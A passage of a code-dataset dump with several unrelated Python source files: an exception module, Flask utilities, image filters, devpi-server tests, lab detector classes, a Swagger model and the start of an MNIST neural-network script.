root.mainloop()\n","sub_path":"VidAn/VidAn.py","file_name":"VidAn.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"489275250","text":"from . import libevt\n\n\nclass EVTErrCode:\n EVT_OK = 0\n EVT_INTERNAL_ERROR = -1\n EVT_INVALID_ARGUMENT = -2\n EVT_INVALID_PRIVATE_KEY = -3\n EVT_INVALID_PUBLIC_KEY = -4\n EVT_INVALID_SIGNATURE = -5\n EVT_INVALID_HASH = -6\n EVT_INVALID_ACTION = -7\n EVT_INVALID_BINARY = -8\n EVT_INVALID_JSON = -9\n EVT_INVALID_ADDRESS = -10\n EVT_SIZE_NOT_EQUALS = -11\n EVT_DATA_NOT_EQUALS = -12\n EVT_INVALID_LINK = -13\n EVT_NOT_INIT = -15\n\n\nclass EVTException(Exception):\n def __init__(self, err):\n if err == 'EVT_INTERNAL_ERROR':\n evt = libevt.check_lib_init()\n code = evt.evt_last_error()\n\n errmsg = '{}: {}'.format(err, code)\n # pass only the message to Exception.__init__; passing self as well\n # would embed the exception instance in its own args tuple\n super().__init__(errmsg)\n else:\n super().__init__(err)\n\n\nclass EVTInternalErrorException(Exception):\n def __init__(self):\n err = 'EVT_INTERNAL_ERROR'\n super().__init__(err)\n\n\nclass EVTInvalidArgumentException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_ARGUMENT'\n super().__init__(err)\n\n\nclass EVTInvalidPrivateKeyException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_PRIVATE_KEY'\n super().__init__(err)\n\n\nclass EVTInvalidPublicKeyException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_PUBLIC_KEY'\n super().__init__(err)\n\n\nclass EVTInvalidSignatureException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_SIGNATURE'\n super().__init__(err)\n\n\nclass EVTInvalidHashException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_HASH'\n super().__init__(err)\n\n\nclass EVTInvalidActionException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_ACTION'\n super().__init__(err)\n\n\nclass EVTInvalidBinaryException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_BINARY'\n super().__init__(err)\n\n\nclass EVTInvalidJsonException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_JSON'\n super().__init__(err)\n\n\nclass EVTInvalidAddressException(Exception):\n def __init__(self):\n 
err = 'EVT_INVALID_ADDRESS'\n super().__init__(err)\n\n\nclass EVTSizeNotEqualsException(Exception):\n def __init__(self):\n err = 'EVT_SIZE_NOT_EQUALS'\n super().__init__(err)\n\n\nclass EVTDataNotEqualsException(Exception):\n def __init__(self):\n err = 'EVT_DATA_NOT_EQUALS'\n super().__init__(err)\n\n\nclass EVTInvalidLinkException(Exception):\n def __init__(self):\n err = 'EVT_INVALID_LINK'\n super().__init__(err)\n\n\nclass EVTNotInitException(Exception):\n def __init__(self):\n err = 'EVT_NOT_INIT'\n super().__init__(err)\n\n\nex_map = {\n EVTErrCode.EVT_INTERNAL_ERROR: EVTInternalErrorException,\n EVTErrCode.EVT_INVALID_ARGUMENT: EVTInvalidArgumentException,\n EVTErrCode.EVT_INVALID_PRIVATE_KEY: EVTInvalidPrivateKeyException,\n EVTErrCode.EVT_INVALID_PUBLIC_KEY: EVTInvalidPublicKeyException,\n EVTErrCode.EVT_INVALID_SIGNATURE: EVTInvalidSignatureException,\n EVTErrCode.EVT_INVALID_HASH: EVTInvalidHashException,\n EVTErrCode.EVT_INVALID_ACTION: EVTInvalidActionException,\n EVTErrCode.EVT_INVALID_BINARY: EVTInvalidBinaryException,\n EVTErrCode.EVT_INVALID_JSON: EVTInvalidJsonException,\n EVTErrCode.EVT_INVALID_ADDRESS: EVTInvalidAddressException,\n EVTErrCode.EVT_INVALID_LINK: EVTInvalidLinkException,\n EVTErrCode.EVT_SIZE_NOT_EQUALS: EVTSizeNotEqualsException,\n EVTErrCode.EVT_DATA_NOT_EQUALS: EVTDataNotEqualsException,\n EVTErrCode.EVT_NOT_INIT: EVTNotInitException\n}\n\n\ndef evt_exception_raiser(error_code):\n if error_code == EVTErrCode.EVT_OK:\n return\n if error_code in ex_map:\n raise ex_map[error_code]\n raise Exception('Unknown error code')\n","sub_path":"bind/pyevt/pyevt/evt_exception.py","file_name":"evt_exception.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"590277245","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/Mardix/Dropbox/Projects/Python/Flasik/flasik/utils.py\n# Compiled at: 2019-09-07 12:28:17\n\"\"\"\n
ie: \n utils.slugify \n utils.dasherize\n \nothers:\n utils.is_email_valid\n utils.md5(string)\n\n\"\"\"\nfrom __future__ import division\nimport os, re, inspect, time, datetime, arrow, string, random, socket, itsdangerous, humanize, pkg_resources, urllib, hashlib, json, uuid\nfrom six import string_types\nfrom slugify import slugify\nfrom werkzeug.utils import import_string\nfrom distutils.dir_util import copy_tree as copy_dir, remove_tree as remove_dir, mkpath as make_dirs\nfrom distutils.file_util import copy_file, move_file\nfrom inflection import dasherize, underscore, camelize, pluralize, singularize, titleize\nfrom six.moves.urllib.parse import urlparse, urlencode, unquote_plus as urllib_unquote_plus\n__all__ = [\n 'is_email_valid',\n 'is_password_valid',\n 'is_username_valid',\n 'is_url_valid',\n 'urldecode',\n 'urlencode',\n 'md5',\n 'guid',\n 'slugify',\n 'chunk_list',\n 'in_any_list',\n 'dict_dot',\n 'list_replace',\n 'dict_replace',\n 'to_json',\n 'dasherize',\n 'undescore',\n 'camelize',\n 'plurialize',\n 'singularize',\n 'titleize']\n\ndef is_email_valid(email):\n \"\"\"\n Check if email is valid\n \"\"\"\n pattern = re.compile('[\\\\w\\\\.-]+@[\\\\w\\\\.-]+[.]\\\\w+')\n return bool(pattern.match(email))\n\n\ndef is_password_valid(password):\n \"\"\"\n Check if a password is valid\n \"\"\"\n pattern = re.compile('^.{4,75}$')\n return bool(pattern.match(password))\n\n\ndef is_username_valid(username):\n \"\"\"\n Check if a valid username.\n valid:\n oracle\n bill-gates\n steve.jobs\n micro_soft\n not valid\n Bill Gates - no space allowed\n me@yo.com - @ is not a valid character\n :param username: string\n :return:\n \"\"\"\n pattern = re.compile('^[a-zA-Z0-9_.-]+$')\n return bool(pattern.match(username))\n\n\ndef is_url_valid(url):\n \"\"\"\n Check if url is valid\n \"\"\"\n pattern = re.compile('^(?:http|ftp)s?://(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\\\.)+(?:[A-Z]{2,6}\\\\.?|[A-Z0-9-]{2,}\\\\.?)|\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})(?::\\\\d+)?(?:/?|[/?]\\\\S+)$', re.IGNORECASE)\n return bool(pattern.match(url))\n\n\ndef urldecode(s):\n return urllib_unquote_plus(s)\n\n\ndef md5(value):\n \"\"\"\n Create MD5\n :param value:\n :return:\n \"\"\"\n m = hashlib.md5()\n m.update(value)\n return str(m.hexdigest())\n\n\ndef guid():\n \"\"\"\n Creates and returns a UUID 4 hex value\n :return: string\n \"\"\"\n return uuid.uuid4().hex\n\n\ndef chunk_list(items, size):\n \"\"\"\n Return a list of chunks\n :param items: List\n :param size: int The number of items per chunk\n :return: List\n \"\"\"\n size = max(1, size)\n return [ items[i:i + size] for i in range(0, len(items), size) ]\n\n\ndef in_any_list(items1, items2):\n \"\"\"\n Check if any items are in list2\n :param items1: list\n :param items2: list\n :return:\n \"\"\"\n return any(i in items2 for i in items1)\n\n\ndef generate_random_string(length=8):\n \"\"\"\n Generate a random string\n \"\"\"\n char_set = string.ascii_uppercase + string.digits\n return ('').join(random.sample(char_set * (length - 1), length))\n\n\ndef generate_random_hash(size=32):\n \"\"\"\n Return a random hash key\n :param size: The max size of the hash\n :return: string\n \"\"\"\n return os.urandom(size // 2).encode('hex')\n\n\nclass dict_dot(dict):\n \"\"\"\n A dict extension that allows dot notation to access the data.\n ie: dict.get('key.key2.0.keyx')\n my_dict = {...}\n d = dict_dot(my_dict)\n d.get(\"key1\")\n d.get(\"key1.key2\")\n d.get(\"key3.key4.0.keyX\")\n\n Still have the ability to access it as a normal dict\n 
d[key1][key2]\n \"\"\"\n\n def get(self, key, default=None):\n \"\"\"\n Access data via\n :param key:\n :param default: the default value\n :return:\n \"\"\"\n try:\n val = self\n if '.' not in key:\n return self[key]\n for k in key.split('.'):\n if k.isdigit():\n k = int(k)\n val = val[k]\n\n return val\n except (TypeError, KeyError, IndexError) as e:\n return default\n\n\ndef list_replace(subject_list, replacement, string):\n \"\"\"\n To replace a list of items by a single replacement\n :param subject_list: list\n :param replacement: string\n :param string: string\n :return: string\n \"\"\"\n for s in subject_list:\n string = string.replace(s, replacement)\n\n return string\n\n\ndef dict_replace(subject_dict, string):\n \"\"\"\n Replace a dict map, key to its value in the stirng\n :param subject_dict: dict\n :param string: string\n :return: string\n \"\"\"\n for i, j in subject_dict.items():\n string = string.replace(i, j)\n\n return string\n\n\ndef to_json(d):\n \"\"\"\n Convert data to json. It formats datetime/arrow time\n :param d: dict or list\n :return: json data\n \"\"\"\n return json.dumps(d, cls=_FlasikJSONEncoder)\n\n\nclass _FlasikJSONEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, arrow.Arrow):\n return obj.for_json()\n if isinstance(obj, datetime.datetime):\n return obj.strftime('%Y-%m-%dT%H:%M:%SZ')\n if isinstance(obj, datetime.date):\n return obj.strftime('%Y-%m-%d')\n return json.JSONEncoder.default(self, obj)\n\n\nclass InspectDecoratorCompatibilityError(Exception):\n pass\n\n\nclass _InspectMethodsDecorators(object):\n \"\"\"\n This class attempt to retrieve all the decorators in a method\n \"\"\"\n\n def __init__(self, method):\n self.method = method\n self.decos = []\n\n def parse(self):\n \"\"\"\n Return the list of string of all the decorators found\n \"\"\"\n self._parse(self.method)\n return list(set([ deco for deco in self.decos if deco ]))\n\n @classmethod\n def extract_deco(cls, line):\n line = line.strip()\n if line.startswith('@'):\n if '(' in line:\n line = line.split('(')[0].strip()\n return line.strip('@')\n\n def _parse(self, method):\n argspec = inspect.getargspec(method)\n args = argspec[0]\n if args and args[0] == 'self':\n return argspec\n else:\n if hasattr(method, '__func__'):\n method = method.__func__\n if not hasattr(method, '__closure__') or method.__closure__ is None:\n raise InspectDecoratorCompatibilityError\n closure = method.__closure__\n for cell in closure:\n inner_method = cell.cell_contents\n if inner_method is method:\n continue\n if not inspect.isfunction(inner_method) and not inspect.ismethod(inner_method):\n continue\n src = inspect.getsourcelines(inner_method)[0]\n self.decos += [ self.extract_deco(line) for line in src ]\n self._parse(inner_method)\n\n return\n\n\ndef get_decorators_list(method):\n \"\"\"\n Shortcut to InspectMethodsDecorators\n :param method: object\n :return: List\n \"\"\"\n kls = _InspectMethodsDecorators(method)\n return kls.parse()","sub_path":"pycfiles/Assembly-1.3.0-py2-none-any/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"534622303","text":"class Solution(object):\n def checkSubarraySum(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: bool\n \"\"\"\n\n if len(nums) < 2: return False\n if sum(nums) == 0: return True\n if k == 0: return False\n if k < 0: k = -k\n mp, s = {}, 0\n for i, n in enumerate(nums):\n s += n\n if 
not s % k and i > 0:\n return True\n if s % k in mp:\n if i - mp[s % k] > 0:\n return True\n else:\n mp[s % k] = i\n return False\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.checkSubarraySum([1, 1], 2))\n pass","sub_path":"continousSubarraySumKMultiple.py","file_name":"continousSubarraySumKMultiple.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"334988111","text":"def blend(pic1, pic2):\n\n # Assumes the pictures are the same size\n\n width, height = getWidth(pic1), getHeight(pic1)\n\n blendedPic = makeEmptyPicture(width, height)\n\n for x in xrange(width):\n for y in xrange(height):\n \n targetPixel = getPixel(blendedPic, x, y)\n\n p1 = getPixel(pic1, x, y)\n p2 = getPixel(pic2, x, y)\n\n r1, g1, b1 = getRed(p1), getGreen(p1), getBlue(p1)\n r2, g2, b2 = getRed(p2), getGreen(p2), getBlue(p2)\n\n blendedColor = makeColor( (r1+r2)/2 , (g1+g2)/2, (b1+b2)/2 )\n\n setColor(targetPixel, blendedColor)\n\n return blendedPic\n\n#Steps to take in command\\/\n#p1 = makePicture(pickAFile()) *this line choses the dome\n#p2 = makePicture(pickAFile()) *this line choses the surface\n#blendedPic = blend(p1, p2) *this executes the algorithm to the desired pictures, in this case P1(the dome) ontop P2(the surface)\n#show(blendedPic) *this finally shows the effect on screen\n\ndef BW(pic):\n picture = duplicatePicture(pic)\n for px in getPixels(picture):\n \n luminance = ( getRed(px) + getBlue(px) + getGreen(px) )/3\n if luminance < 50:\n setColor(px, makeColor(50, 50, 50))\n elif luminance < 100:\n setColor(px, makeColor(100, 100, 100))\n elif luminance < 150:\n setColor(px, makeColor(150, 150, 150))\n elif luminance < 200:\n setColor(px, makeColor(200, 200, 200))\n else:\n setColor(px, white)\n return picture\n# This effect essentially tones down All RGB (red, green & blue) values of the image leaving it a simple black and white frame.\n# STEPS TO TAKE: \\/\n# pic = makePicture(pickAFile())\n# BWpic = BW(pic)\n# show(BWpic)\n\ndef edge(pic, precision = 4): #the value at the end of this line determines the strength of effect (4 is recommended)\n \n picture = duplicatePicture(pic)\n width, height = getWidth(pic) , getHeight(pic)\n \n for y in xrange(height - 1):\n for x in xrange(width - 1):\n \n px = getPixel(picture, x, y) # original pixel\n right = getPixel(picture, x + 1, y)\n below = getPixel(picture, x, y + 1)\n \n luminance = lambda px: (getRed(px) + getBlue(px) + getGreen(px) )/3\n \n LR = luminance(right)\n LB = luminance(below)\n LO = luminance(px)\n \n if abs(LR - LO) > precision and abs(LB - LO) > precision:\n setColor(px, black)\n else:\n setColor(px, white)\n \n return picture\n\n# picture = makePicture(pickAFile())\n# edgeSpace = edge(picture)\n# show(edgeSpace)\n\ndef negative(picture):\n\n copy = duplicatePicture(picture)\n\n for px in getPixels(copy):\n \n R = getRed(px)\n G = getGreen(px)\n B = getBlue(px)\n \n negativeColor = makeColor(255 - R, 255-G, 255-B)\n setColor(px, negativeColor)\n \n return copy\n\n\n# This is the program that would run all effects with one input.\n# The images I used were the same size of 600px, 600px\n# Images included with source code\n# P1 is Dome\n# P2 is Pillars of creation\n\ndef main():\n p1 = makePicture(pickAFile())\n p2 = makePicture(pickAFile())\n blendedPic = blend(p1, p2)\n show(blendedPic) \n BWpic = BW(blendedPic)\n show(BWpic)\n edgeSpace = edge(BWpic)\n show(edgeSpace)\n negativePic = negative(edgeSpace)\n 
show(negativePic)","sub_path":"All effects.py","file_name":"All effects.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"517890694","text":"from enum import Enum, unique\n\n\n@unique\nclass Status(Enum):\n Init, Waiting, Running, Cancelled, Errored, Finished = range(6)\n\n def label(self):\n if self.name == 'Cancelled': return 'label-warning'\n if self.name == 'Errored': return 'label-danger'\n if self.name == 'Finished': return 'label-success'\n return 'label-info'\n","sub_path":"Executor/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"111574625","text":"import sys\nimport os\nimport py\nimport pytest\nfrom .conftest import get_open_port\nfrom devpi_server.main import main\nfrom devpi_server.bgserver import no_proxy\n\n\n@pytest.mark.skipif(\"not config.option.slow\")\ndef test_server_commands(tmpdir, monkeypatch):\n monkeypatch.setenv(\"DEVPISERVER_SERVERDIR\", tmpdir.strpath)\n monkeypatch.setattr(sys, \"argv\",\n [str(py.path.local.sysfind(\"devpi-server\"))])\n if sys.platform == \"win32\":\n # Windows strips the \"exe\" from the first argument of sys.argv\n # The first entry in sys.path contains the executable path\n monkeypatch.setattr(sys, \"path\",\n [sys.argv[0]] + sys.path)\n monkeypatch.setattr(sys, \"argv\",\n [sys.argv[0][:-4]])\n\n port = get_open_port('localhost')\n portopt = \"--port=\" + str(port)\n main([\"devpi-server\", \"--init\", \"--start\", portopt])\n try:\n main([\"devpi-server\", \"--status\"])\n main([\"devpi-server\", \"--log\"])\n # make sure we can't start a server if one is already running\n with pytest.raises(SystemExit):\n main([\"devpi-server\", \"--start\", portopt])\n finally:\n main([\"devpi-server\", \"--stop\"])\n\n\ndef test_no_proxy(monkeypatch):\n envvars = [\"no_proxy\", \"NO_PROXY\"]\n for var in envvars:\n monkeypatch.setenv(var, \"123\")\n\n with no_proxy(\"localhost:8080\"):\n assert os.environ[\"no_proxy\"] == \"localhost:8080\"\n # on windows env variable names are case-insensitive\n if not sys.platform.startswith(\"win32\"):\n assert \"NO_PROXY\" not in os.environ\n\n for var in envvars:\n assert os.environ[var] == \"123\"\n","sub_path":"server/test_devpi_server/test_bgserver.py","file_name":"test_bgserver.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96650988","text":"#! /usr/bin/env nix-shell\n#! 
nix-shell -i python -p python python2Packages.lxml\n\nimport lxml.etree as et\n\n#fname='780b91b0ef99cf032d5e73b2fa21c7f76f94fb98bc0a31d20bbdb9413c3f1c03-primary.xml'\nfname='48986ce4583cd09825c6d437150314446f0f49fa1a1bd62dcfa1085295030fe9-primary.xml'\nwith open(fname) as f:\n tree=et.fromstring(f.read())\n\nnames = set(tree.xpath(\"//*[name()='package']/*[name()='name']/text()\"))\nprefix_len = lambda prefix,names : len(filter(lambda x:x.startswith(prefix),names))\n\nprint (\"total=%s\" % len(names))\nprint (\"py2=%s\" % prefix_len('python2-',names))\nprint (\"py=%s\" % prefix_len('python-',names))\nprint (\"py3=%s\" % prefix_len('python3-',names))\n","sub_path":"fedora-pkgs/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"62877134","text":"#!/usr/bin/env python\n#pylint: skip-file\n\"\"\"\nCopyright 2016 Cisco Systems\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nclass Constructor(object):\n\n\n\n def __init__(self):\n \"\"\"\n Attributes:\n swaggerTypes (dict): The key is attribute name and the value is attribute type.\n attributeMap (dict): The key is attribute name and the value is json key in definition.\n \"\"\"\n self.swaggerTypes = {\n\n 'modifiers': 'int',\n\n\n 'name': 'str',\n\n\n 'synthetic': 'bool',\n\n\n 'typeParameters': 'list[TypeVariable]',\n\n\n 'declaringClass': 'Class«object»',\n\n\n 'declaredAnnotations': 'list[Annotation]',\n\n\n 'parameterTypes': 'list[Class]',\n\n\n 'genericParameterTypes': 'list[Type]',\n\n\n 'exceptionTypes': 'list[Class]',\n\n\n 'genericExceptionTypes': 'list[Type]',\n\n\n 'varArgs': 'bool',\n\n\n 'parameterAnnotations': 'list[Array]',\n\n\n 'annotations': 'list[Annotation]',\n\n\n 'accessible': 'bool'\n\n }\n\n self.attributeMap = {\n\n 'modifiers': 'modifiers',\n\n 'name': 'name',\n\n 'synthetic': 'synthetic',\n\n 'typeParameters': 'typeParameters',\n\n 'declaringClass': 'declaringClass',\n\n 'declaredAnnotations': 'declaredAnnotations',\n\n 'parameterTypes': 'parameterTypes',\n\n 'genericParameterTypes': 'genericParameterTypes',\n\n 'exceptionTypes': 'exceptionTypes',\n\n 'genericExceptionTypes': 'genericExceptionTypes',\n\n 'varArgs': 'varArgs',\n\n 'parameterAnnotations': 'parameterAnnotations',\n\n 'annotations': 'annotations',\n\n 'accessible': 'accessible'\n\n }\n\n\n\n self.modifiers = None # int\n\n\n self.name = None # str\n\n\n self.synthetic = None # bool\n\n\n self.typeParameters = None # list[TypeVariable]\n\n\n self.declaringClass = None # Class«object»\n\n\n self.declaredAnnotations = None # list[Annotation]\n\n\n self.parameterTypes = None # list[Class]\n\n\n self.genericParameterTypes = None # list[Type]\n\n\n self.exceptionTypes = None # list[Class]\n\n\n self.genericExceptionTypes = None # list[Type]\n\n\n self.varArgs = None # bool\n\n\n self.parameterAnnotations = None # list[Array]\n\n\n self.annotations = None # list[Annotation]\n\n\n self.accessible = None # 
bool\n\n","sub_path":"apis/nb/clients/inventory_manager_client/models/Constructor.py","file_name":"Constructor.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154961308","text":"\"\"\"\nBase detector functions, i.e. Detector_Function and its first order descendents\nextracted from pycqed/measurement/detector_functions.py commit 0da380ad2adf2dc998f5effef362cdf264b87948\n\"\"\"\n\nimport numpy as np\n\n\nclass Detector_Function(object):\n\n '''\n Detector_Function class for MeasurementControl\n '''\n\n def __init__(self, **kw):\n self.name = self.__class__.__name__\n self.detector_control = ''\n self.set_kw()\n self.value_names = ['val A', 'val B']\n self.value_units = ['arb. units', 'arb. units']\n\n self.prepare_function = None\n self.prepare_function_kwargs = None\n\n def set_kw(self, **kw):\n '''\n convert keywords to attributes\n '''\n for key in list(kw.keys()):\n exec('self.%s = %s' % (key, kw[key]))\n\n def arm(self):\n \"\"\"\n Ensures acquisition instrument is ready to measure on first trigger.\n \"\"\"\n pass\n\n # FIXME: seems to be overridden by every class except None_Detector, so probably misplaced\n def prepare(self, **kw):\n if self.prepare_function_kwargs is not None:\n if self.prepare_function is not None:\n self.prepare_function(**self.prepare_function_kwargs)\n else:\n if self.prepare_function is not None:\n self.prepare_function()\n\n def set_prepare_function(self,\n prepare_function,\n prepare_function_kwargs: dict = dict()):\n \"\"\"\n Set an optional custom prepare function.\n\n prepare_function: function to call during prepare\n prepare_function_kwargs: keyword arguments to be passed to the\n prepare_function.\n\n N.B. Note that not all detectors support a prepare function and\n the corresponding keywords.\n Detectors that do not support this typicaly ignore these attributes.\n \"\"\"\n self.prepare_function = prepare_function\n self.prepare_function_kwargs = prepare_function_kwargs\n\n def get_values(self): # FIXME: only for Hard_Detector?\n pass\n\n def finish(self, **kw):\n pass\n\n\nclass Mock_Detector(Detector_Function):\n def __init__(\n self,\n value_names=['val'],\n value_units=['arb. 
units'],\n detector_control='soft',\n mock_values=np.zeros([20, 1]),\n **kw\n ):\n self.name = self.__class__.__name__\n self.set_kw()\n self.value_names = value_names\n self.value_units = value_units\n self.detector_control = detector_control\n self.mock_values = mock_values\n self._iteration = 0\n\n def acquire_data_point(self, **kw):\n '''\n Returns something random for testing\n '''\n idx = self._iteration % (np.shape(self.mock_values)[0])\n self._iteration += 1\n return self.mock_values[idx]\n\n def get_values(self):\n return self.mock_values\n\n def prepare(self, **kw):\n pass\n\n def finish(self, **kw):\n pass\n\n\nclass Multi_Detector(Detector_Function):\n \"\"\"\n Combines several detectors of the same type (hard/soft) into a single\n detector.\n \"\"\"\n\n def __init__(\n self,\n detectors: list,\n detector_labels: list = None,\n det_idx_prefix: bool = True,\n **kw\n ):\n \"\"\"\n detectors (list):\n a list of detectors to combine.\n det_idx_prefix(bool):\n if True prefixes the value names with\n detector_labels (list):\n if not None, will be used instead instead of\n \"det{idx}_\" as a prefix for the different channels\n \"\"\"\n self.detectors = detectors\n self.name = 'Multi_detector'\n self.value_names = []\n self.value_units = []\n for i, detector in enumerate(detectors):\n for detector_value_name in detector.value_names:\n if det_idx_prefix:\n if detector_labels is None:\n val_name = 'det{} '.format(i) + detector_value_name\n else:\n val_name = detector_labels[i] + \\\n ' ' + detector_value_name\n else:\n val_name = detector_value_name\n self.value_names.append(val_name)\n for detector_value_unit in detector.value_units:\n self.value_units.append(detector_value_unit)\n\n self.detector_control = self.detectors[0].detector_control\n for d in self.detectors:\n if d.detector_control != self.detector_control:\n raise ValueError('All detectors should be of the same type')\n\n def prepare(self, **kw):\n for detector in self.detectors:\n detector.prepare(**kw)\n\n def set_prepare_function(\n self,\n prepare_function,\n prepare_function_kw: dict = dict(),\n detectors: str = 'all'\n ):\n \"\"\"\n Set an optional custom prepare function.\n\n prepare_function: function to call during prepare\n prepare_function_kw: keyword arguments to be passed to the\n prepare_function.\n detectors : |\"all\"|\"first\"|\"last\"|\n sets the prepare function to \"all\" child detectors, or only\n on the \"first\" or \"last\"\n\n The multi detector passes the arguments to the set_prepare_function\n method of all detectors it contains.\n \"\"\"\n if detectors == \"all\":\n for detector in self.detectors:\n detector.set_prepare_function(\n prepare_function, prepare_function_kw)\n elif detectors == 'first':\n self.detectors[0].set_prepare_function(\n prepare_function, prepare_function_kw)\n elif detectors == 'last':\n self.detectors[-1].set_prepare_function(\n prepare_function, prepare_function_kw)\n\n def set_child_attr(self, attr, value, detectors: str = 'all'):\n \"\"\"\n Set an attribute of child detectors.\n\n attr (str): the attribute to set\n value : the value to set the attribute to\n\n detectors : |\"all\"|\"first\"|\"last\"|\n sets the attribute on \"all\" child detectors, or only\n on the \"first\" or \"last\"\n \"\"\"\n if detectors == \"all\":\n for detector in self.detectors:\n setattr(detector, attr, value)\n elif detectors == 'first':\n setattr(self.detectors[0], attr, value)\n elif detectors == 'last':\n setattr(self.detectors[-1], attr, value)\n\n def get_values(self):\n values_list = []\n 
for detector in self.detectors:\n detector.arm()\n for detector in self.detectors:\n new_values = detector.get_values()\n values_list.append(new_values)\n values = np.concatenate(values_list)\n return values\n\n def acquire_data_point(self):\n # N.B. get_values and acquire_data point are virtually identical.\n # the only reason for their existence is a historical distinction\n # between hard and soft detectors that leads to some confusing data\n # shape related problems, hence the append vs concatenate\n values = []\n for detector in self.detectors:\n new_values = detector.acquire_data_point()\n values = np.append(values, new_values)\n return values\n\n def finish(self):\n for detector in self.detectors:\n detector.finish()\n\n\nclass None_Detector(Detector_Function):\n\n def __init__(self, **kw):\n super(None_Detector, self).__init__()\n self.detector_control = 'soft'\n self.set_kw()\n self.name = 'None_Detector'\n self.value_names = ['None']\n self.value_units = ['None']\n\n def acquire_data_point(self, **kw):\n '''\n Returns something random for testing\n '''\n return np.random.random()\n\n\nclass Soft_Detector(Detector_Function):\n\n def __init__(self, **kw):\n super().__init__(**kw)\n self.detector_control = 'soft'\n\n def prepare(self, sweep_points=None):\n pass\n\n def acquire_data_point(self, **kw):\n return np.random.random()\n\n\nclass Hard_Detector(Detector_Function):\n\n def __init__(self, **kw):\n super().__init__()\n self.detector_control = 'hard'\n\n def prepare(self, sweep_points=None):\n pass\n","sub_path":"pycqed/measurement/det_fncs/Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"123558575","text":"# -*- coding: utf-8 -*-\n\nimport pickle\nimport datetime as dt\nimport sys\nfrom mnist_loader import training_x, training_d as training_y, test_x, test_d as test_y\nfrom utils import *\n\n# Setting\noutput_path = ''\nif len(sys.argv) == 2 and sys.argv[1] == 'y':\n output_path = '/output/'\n\ntraining_x = np.array(training_x)\ntest_x = np.array(test_x)\n\ntraining_x /= 255.0\ntest_x /= 255.0\ntraining_y, _ = one_to_hot(training_y.A1)\ntest_y, _ = one_to_hot(test_y.A1)\nlabels = list(range(10))\n\nn_epoch = 30\nbatch_size = 100\nnn_list = dict()\n\n# 1. No hidden layer\nlayers = list()\nlayers.append(Input(28*28))\n\nlayers.append(FullyConnected(28*28, 10))\nlayers.append(Softmax())\n\nnn_list['NO_HIDDEN_LAYER'] = {'NN': NeuralNetwork(layers, CrossEntropy, labels), 'SGD': SGD(1.0)}\n\n\n# 2. 1-hidden layer\nlayers = list()\nlayers.append(Input(28*28))\n\nlayers.append(FullyConnected(28*28, 100))\nlayers.append(ReLU())\n\nlayers.append(FullyConnected(100, 10))\nlayers.append(Softmax())\n\nnn_list['1_HIDDEN_LAYER'] = {'NN': NeuralNetwork(layers, CrossEntropy, labels), 'SGD': SGD(1.0)}\n\n\n# 3. 2-hidden layer\nlayers = list()\nlayers.append(Input(28*28))\n\nlayers.append(FullyConnected(28*28, 100))\nlayers.append(ReLU())\n\nlayers.append(FullyConnected(100, 100))\nlayers.append(ReLU())\n\nlayers.append(FullyConnected(100, 10))\nlayers.append(Softmax())\n\nnn_list['2_HIDDEN_LAYER'] = {'NN': NeuralNetwork(layers, CrossEntropy, labels), 'SGD': SGD(1.0)}\n\n\n# 4. 
